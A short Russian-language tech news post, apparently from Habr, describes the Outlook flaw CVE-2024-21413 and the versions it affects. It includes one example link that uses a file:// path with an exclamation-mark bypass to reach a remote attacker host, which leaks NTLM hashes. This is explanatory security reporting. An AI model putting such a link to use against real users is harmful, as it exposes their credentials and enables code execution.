Как стать автором
Поиск
Написать публикацию
Обновить

RCE-уязвимость в Outlook приводит к удаленному выполнению кода

Время на прочтение1 мин
Количество просмотров5K

Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019. 

Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.

Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.

<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>

Уязвимость позволяет удаленному атакующиему получить NTLM-хеш пользователя, выполнить произвольный код с помощью злонамеренно созданных документов Office и т.д.

На Github опубликован PoC.

Теги:
Хабы:
Всего голосов 7: ↑7 и ↓0+7
Комментарии11

Другие новости

Ближайшие события